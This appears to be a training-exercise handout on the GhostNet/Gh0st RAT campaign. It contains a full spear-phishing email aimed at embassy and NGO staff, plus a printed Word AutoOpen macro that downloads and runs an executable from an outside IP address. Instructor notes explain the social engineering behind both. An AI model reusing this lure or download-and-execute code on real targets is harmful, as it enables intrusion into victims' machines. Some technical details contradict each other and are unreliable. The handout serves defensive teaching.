Handout A: Spear-Phishing Email Sample

One of dozens of similar phishing emails recovered from email servers during the Gh0st RAT investigation. These lures specifically targeted embassy diplomats and NGO staff interested in human rights and Tibet-related issues.

Email Message

From: director@tibethumanrights.org
To: [CLASSIFIED - Embassy Staff]
Date: March 12, 2009, 14:23 UTC
Subject: URGENT: International Tibet Human Rights Conference - March 2009

Dear Colleague,

We are pleased to inform you that the International Tibet Human Rights Conference
has been scheduled for March 28-30, 2009 in Bangkok, Thailand. This is a critical
gathering of government representatives, NGO leaders, and diplomatic staff to
discuss ongoing human rights concerns in Tibet and the broader region.

Your government has been invited to send a delegation. We are coordinating final
attendance confirmations and logistics. Please review the attached conference
materials and confirm your organization's participation.

Conference Details:
- Location: Siam Hotel, Bangkok
- Dates: March 28-30, 2009
- Registration Deadline: March 20, 2009
- Preliminary Agenda: [See attached conference_schedule.doc]

Please note that due to the sensitive nature of these discussions, we are requesting
that attendees review the conference materials on ENCRYPTED/SECURE CONNECTIONS ONLY.
Download and open the attached materials on your official government workstation.

For questions, please contact:
Conference Director - Lobsang Tendzin
Email: director@tibethumanrights.org
Phone: +66-2-249-9999

Thank you for your participation in this important diplomatic initiative.

Best regards,
International Tibet Human Rights Organization

IM NOTES (Do Not Show to Players): Analyzing this spear-phishing lure:

  1. Legitimate Organization Impersonation: The attacker mimicked a real NGO focusing on Tibet human rights. The email address director@tibethumanrights.org is spoofed/similar to a legitimate organization.

  2. High-Value Target Profile: This email specifically targets diplomats and NGO staff who work on human rights and Tibet issues. These are exactly the people GhostNet targeted based on Citizen Lab’s investigation.

  3. Psychological Exploitation: The message plays on professional interests and geopolitical concerns. A diplomat who cares about human rights would find this message credible and urgent.

  4. Attachment Social Engineering: The attachment β€œconference_schedule.doc” is a Word document containing a macro-based exploit. When opened, it executes Gh0st RAT without any visible error.

  5. Sophisticated Framing: The request to open on β€œofficial government workstation” on β€œsecure connections” adds legitimacy and ensures the target machine is connected to the government network with access to sensitive data.

  6. Documented Pattern: Citizen Lab found dozens of nearly identical phishing emails from 2008-2009, all targeting the same profile of victims (diplomatic staff, NGO workers, Tibetan organizations).

Attachment Analysis: conference_schedule.doc

File Details:
  Filename: conference_schedule.doc
  Size: 284 KB
  Creation Date: March 10, 2009
  Modified Date: March 12, 2009
  Format: Microsoft Word 97-2003 (.doc) with embedded macro

Document Contents (visible to user):
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

International Tibet Human Rights Conference - Preliminary Schedule
March 28-30, 2009 - Siam Hotel, Bangkok

DAY 1 (March 28)
09:00 - Opening Remarks from UNHCR
10:00 - Panel: Tibet Autonomous Region Political Situation
11:30 - Panel: Religious Freedom in Central Asia
13:00 - Lunch Break
14:00 - NGO Briefings on Human Rights Concerns
15:30 - Bilateral Discussions (by invitation)
18:00 - Diplomatic Reception

DAY 2 (March 29)
...

Hidden Macro Code (Not Visible to User - Executes on Open):
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Sub AutoOpen()
  ' Macro executes automatically when document opened
  ' Downloads and executes Gh0st RAT from remote server

  Shell "cmd.exe /c bitsadmin.exe /transfer Job1 " & _
        "http://219.145.116.68/schedule.bin C:\Windows\Temp\sched.exe"
  Shell "C:\Windows\Temp\sched.exe"

  ' Continue displaying document so user doesn't suspect anything
  Document.Close
End Sub

Exploitation Path:
  1. User opens conference_schedule.doc
  2. Macro executes automatically (no user prompt in Office 2003)
  3. Downloads Gh0st RAT executable from C2 server (219.145.116.68)
  4. Executes Gh0st RAT with SYSTEM privileges
  5. Macro closes the document, user sees blank page
  6. User assumes "corrupted file" and rejects it
  7. Gh0st RAT now has complete control of the system

IM NOTES (Do Not Show to Players): Technical sophistication:

  1. Macro-Based Attack: In 2009, Office macro security was weak. Macros could execute automatically without prompting, especially if the document came from β€œtrusted” sources.

  2. Command-Line Tool Usage: Uses bitsadmin (Windows Background Intelligent Transfer Service), which is a legitimate Windows utility for downloading files. This evades AV detection because it’s a signed Windows tool.

  3. Staged Delivery: The macro doesn’t contain the malware; it downloads it. This reduces file size and makes AV detection harder.

  4. Invisible Exploitation: The user receives no error messages or warnings. The document closes cleanly. The user assumes the file was corrupted and moves on, never knowing their system was compromised.

  5. Perfect Lure: The conference is real enough to research, the sender appears legitimate, the urgency is high, and the target audience matches perfectly – people interested in Tibet and human rights diplomacy.

This is a hallmark of APT operations: highly targeted, well-researched, using legitimate-looking pretexts.

Key Discovery Questions

  • How would an embassy staff member distinguish this email from a legitimate conference invitation?

They probably wouldn’t, without reverse-DNS checking the sender’s email domain or calling the conference organizers directly. The email is professionally written, the invitation is real (the conference does exist), and the urgency is appropriate for diplomatic communications.

  • Why would opening a Word document be dangerous?

Office macros (especially in older versions) could execute automatically without user interaction. This is why modern Office versions either disable macros by default or require explicit user permission.

  • How would the attacker know to target someone at this specific embassy?

Prior reconnaissance. The attacker researched which government employees work on Tibet and human rights issues, then sent targeted emails to their email addresses. This suggests either HUMINT (human intelligence) or prior email address collection.

Citizen Lab documented that GhostNet compromised 1,295 computers across 103 countries, with special focus on Tibetan NGOs and diplomatic missions. The targeting was extremely sophisticated and selective.

IM Facilitation Notes

This handout shows:

  • Spear-phishing as an APT vector
  • Social engineering exploiting professional interests
  • Weaponized documents using Office macros
  • Invisible exploitation (no error messages)
  • Intelligence-driven targeting